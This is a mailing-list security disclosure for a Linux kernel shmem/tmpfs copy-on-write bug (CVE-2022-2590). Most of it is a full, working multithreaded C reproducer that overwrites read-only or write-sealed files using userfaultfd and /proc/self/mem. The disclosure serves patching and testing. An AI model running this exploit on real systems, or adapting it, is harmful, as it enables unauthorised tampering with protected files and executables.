[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] Re: CVE-2022-2590: Linux kernel: Modifying shmem/tmpfs files without write permission
From:       David Hildenbrand <david () redhat ! com>
Date:       2022-08-15 6:59:02
Message-ID: 96f1c805-f41c-6341-5849-2e84b4587f1a () redhat ! com
[Download RAW message or body]

On 08.08.22 09:18, David Hildenbrand wrote:
> Hi,
> 
> I found a security issue (CVE-2022-2590) in the Linux kernel similar to
> Dirty COW (CVE-2016-5195), however, restricted to shared memory (shmem /
> tmpfs). I notified distributions one week ago and the embargo ended today.
> 
> An unprivileged user can modify file content of a shmem (tmpfs) file,
> even if that user does not have write permissions to the file. The file
> could be an executable.
> 
> The introducing upstream commit ID is:
>   9ae0f87d009c ("mm/shmem: unconditionally set pte dirty in
>   mfill_atomic_install_pte")
> 
> Linux >= v5.16 is affected on x86-64 and aarch64 if the kernel is
> compiled with CONFIG_USERFAULTFD=y. For Linux < v5.19 it's sufficient to
> revert the problematic commit, which is possible with minor contextual
> conflicts. For Linux >= v5.19 I'll send a proposal fix today.
> 
> I have a working reproducer that I will post as reply to this mail in
> one week (August 15).
> 

Hi,

attached is the reproducer. When run without arguments, it will test
with a memfd that is sealed for writes.

upstream, 5.18-stable and 5.19-stable are still to be fixed. The fix is
on its way upstream and us already in -next, so I suppose it should all
be fixed fairly soonish.

-- 
Thanks,

David / dhildenb
["reproducer.c" (text/x-csrc)]

/*
 * This is a reproducer for a new privilege escalation issue, similar to
 * Dirty COW (CVE-2016-5195), introduced by accident into the Linux kernel via:
 *     9ae0f87d009c ("mm/shmem: unconditionally set pte dirty in mfill_atomic_install_pte")
 * Part of Linux v5.16 -- v5.19.
 *
 * In contrast to Dirty COW, it's limited to shmem only. It uses a combination
 * of userfaultfd UFFDIO_CONTINUE and madvise(MADV_DONTNEED) to trick
 * the kernel into not breaking COW, instead allowing to modify an
 * shmem page without write permissions.
 *
 * Example:
 *   $ sudo -s
 *   # rm /tmp/foo
 *   # echo "Shared data" > /tmp/foo
 *   # chmod 0404 /tmp/foo
 *   # exit
 *   $ ls -l /tmp/foo
 *   -r-----r-- 1 root root 12 26. Jul 10:26 /tmp/foo
 *   $ cat /tmp/foo
 *   Shared data
 *   $ gcc -pthread reproducer.c -o reproducer
 *   $ ./reproducer /tmp/foo
 *   Old content:
 *   Shared data
 *
 *   New content:
 *   10:27:53ata
 *   $ cat /tmp/foo
 *   10:27:53ata
 *
 * To reproduce faster, it might help to load the system, for example,
 * using:
 *   $ stress -c `nproc --all`
 * Or running it inside a VM.
 *
 * Details:
 *   We want the following sequence to trigger. Assuming the shared page is
 *   mapped R/O already (e.g., due to previous action from Thread 1):
 *   Thread 2: pwrite() [start]
 *	-> Trigger write fault, replace mapped page by anonymous page
 *	-> COW was broken, remember FOLL_COW
 *   Thread 1: madvise(map, 4096, MADV_DONTNEED);
 *	-> Discard anonymous page
 *   Thread 1: tmp += *((int *)map);
 *	-> Trigger a minor uffd fault
 *   Thread 3: ioctl(uffd, UFFDIO_CONTINUE
 *	-> Resolve minor uffd fault via UFFDIO_CONTINUE
 *	-> Map shared page R/O but set it dirty
 *   Thread 2: pwrite() [continue]
 *	-> Find R/O mapped page that's dirty and FOLL_COW being set
 *	-> Modify shared page R/O because we don't break COW (again)
 *
 * Dirty COW (CVE-2016-5195) was originally identified by Phil Oester.
 *
 * Thanks to Nadav Amit for pointing out that the pte_dirty() check in
 * FOLL_FORCE code is problematic and might be exploitable.
 *
 * Copyright (C) 2022  Red Hat, Inc.
 * Author(s): David Hildenbrand <david@redhat.com>
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <stdlib.h>
#include <poll.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <linux/userfaultfd.h>

int mem_fd;
void *map;
volatile int tmp;
int uffd;

char str[80];

void *discard_thread_fn(void *arg)
{
	int ret;

	while (1) {
		/*
		 * Zap that page first, such that we can trigger a new
		 * minor fault.
		 */
		ret = madvise(map, 4096, MADV_DONTNEED);
		if (ret < 0) {
			fprintf(stderr, "madvise() failed: %d\n", errno);
			exit(1);
		}
		/*
		 * Touch the page to trigger a UFFD minor fault. The uffd
		 * thread will resolve the minor fault via a UFFDIO_CONTINUE.
		 */
		tmp += *((int *)map);
	}
}

void *write_thread_fn(void *arg)
{
	while (1)
		/*
		 * Ignore any errors -- errors means that pwrite() would
		 * have to trigger a uffd fault and sleep, which the GUP
		 * variant doesn't support, so it fails with an I/O errror.
		 *
		 * Once we retry and are lucky to already find the placed
		 * page via UFFDIO_CONTINUE (from the other threads), we get
		 * no error.
		 */
		pwrite(mem_fd, str, strlen(str), (uintptr_t) map);
}

static void *uffd_thread_fn(void *arg)
{
	static struct uffd_msg msg;   /* Data read from userfaultfd */
	struct uffdio_continue uffdio;
	struct uffdio_range uffdio_wake;
	ssize_t nread;

	while (1) {
		struct pollfd pollfd;
		int nready;

		pollfd.fd = uffd;
		pollfd.events = POLLIN;
		nready = poll(&pollfd, 1, -1);
		if (nready == -1) {
			fprintf(stderr, "poll() failed: %d\n", errno);
			exit(1);
		}

		nread = read(uffd, &msg, sizeof(msg));
		if (nread <= 0)
			continue;

		uffdio.range.start = (unsigned long) map;
		uffdio.range.len = 4096;
		uffdio.mode = 0;
		if (ioctl(uffd, UFFDIO_CONTINUE, &uffdio) < 0) {
			if (errno == EEXIST) {
				uffdio_wake.start = (unsigned long) map;
				uffdio_wake.len = 4096;
				if (ioctl(uffd, UFFDIO_WAKE, &uffdio_wake) < 0) {

				}
			} else {
				fprintf(stderr, "UFFDIO_CONTINUE failed: %d\n", errno);
			}
		}
	}
}

static int setup_uffd(void)
{
	struct uffdio_api uffdio_api;
	struct uffdio_register uffdio_register;

	uffd = syscall(__NR_userfaultfd,
		       O_CLOEXEC | O_NONBLOCK | UFFD_USER_MODE_ONLY);
	if (uffd < 0) {
		fprintf(stderr, "syscall() failed: %d\n", errno);
		return -errno;
	}

	uffdio_api.api = UFFD_API;
	uffdio_api.features = UFFD_FEATURE_MINOR_SHMEM;
	if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) {
		fprintf(stderr, "UFFDIO_API failed: %d\n", errno);
		return -errno;
	}

	if (!(uffdio_api.features & UFFD_FEATURE_MINOR_SHMEM)) {
		fprintf(stderr, "UFFD_FEATURE_MINOR_SHMEM missing\n");
		return -ENOSYS;
	}

	uffdio_register.range.start = (unsigned long) map;
	uffdio_register.range.len = 4096;
	uffdio_register.mode = UFFDIO_REGISTER_MODE_MINOR;
	if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) {
		fprintf(stderr, "UFFDIO_REGISTER failed: %d\n", errno);
		return -errno;
	}

	return 0;
}

static void print_content(int fd)
{
	ssize_t ret;
	char buf[80];
	int offs = 0;

	while (1) {
		ret = pread(fd, buf, sizeof(buf) - 1, offs);
		if (ret > 0) {
			buf[ret] = 0;
			printf("%s", buf);
			offs += ret;
		} else if (!ret) {
			break;
		} else {
			fprintf(stderr, "pread() failed: %d\n", errno);
		}
	}
	printf("\n");
}

int main(int argc, char *argv[])
{
	pthread_t thread1, thread2, thread3;
	struct tm *time_info;
	time_t current_time;
	char tmp[80];
	int fd;

	if (argc < 2) {
		const char *shared_str = "Shared data";

		printf("Testing with sealed memfd\n");
		fd = memfd_create("test", MFD_ALLOW_SEALING);
		if (fd < 0) {
			fprintf(stderr, "memfd_create() failed: %d\n", errno);
			return 1;
		}
		if (ftruncate(fd, strlen(shared_str))) {
			fprintf(stderr, "ftruncate() failed: %d\n", errno);
			return 1;
		}
		if (pwrite(fd, shared_str, strlen(shared_str), 0) !=
		    strlen(shared_str)) {
			fprintf(stderr, "pwrite() failed: %d\n", errno);
			return 1;
		}
		if (fcntl(fd, F_ADD_SEALS, F_SEAL_GROW | F_SEAL_SHRINK |
			  F_SEAL_WRITE | F_SEAL_SEAL) < 0) {
			fprintf(stderr, "fcntl() failed: %d\n", errno);
			return 1;
		}
	} else if (argc == 2) {
		fd = open(argv[1], O_RDONLY);
		if (fd < 0) {
			fprintf(stderr, "open() failed: %d\n", errno);
			return 1;
		}
	} else {
		fprintf(stderr, "usage: %s target_file\n", argv[0]);
		return 1;
	}

	mem_fd = open("/proc/self/mem", O_RDWR);
	if (mem_fd < 0) {
		fprintf(stderr, "open(/proc/self/mem) failed: %d\n", errno);
		return 1;
	}

	map = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd ,0);
	if (map == MAP_FAILED) {
		fprintf(stderr, "mmap() failed: %d\n", errno);
		return 1;
	}

	if (setup_uffd())
		return 1;

	/* Prepare the string we'll want to store. */
	time(&current_time);
	time_info = localtime(&current_time);
	strftime(str, sizeof(str), "%H:%M:%S", time_info);

	printf("Old content: \n");
	print_content(fd);

	pthread_create(&thread1, NULL, discard_thread_fn, NULL);
	pthread_create(&thread2, NULL, write_thread_fn, NULL);
	pthread_create(&thread3, NULL, uffd_thread_fn, NULL);

	/* Loop until we succeeded with our modification. */
	while (1) {
		ssize_t ret = pread(fd, tmp, strlen(str), 0);

		if (ret > 0) {
			tmp[ret] = 0;
			if (!strcmp(tmp, str))
				break;
		}
	}

	printf("New content: \n");
	print_content(fd);

	return 0;
}


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic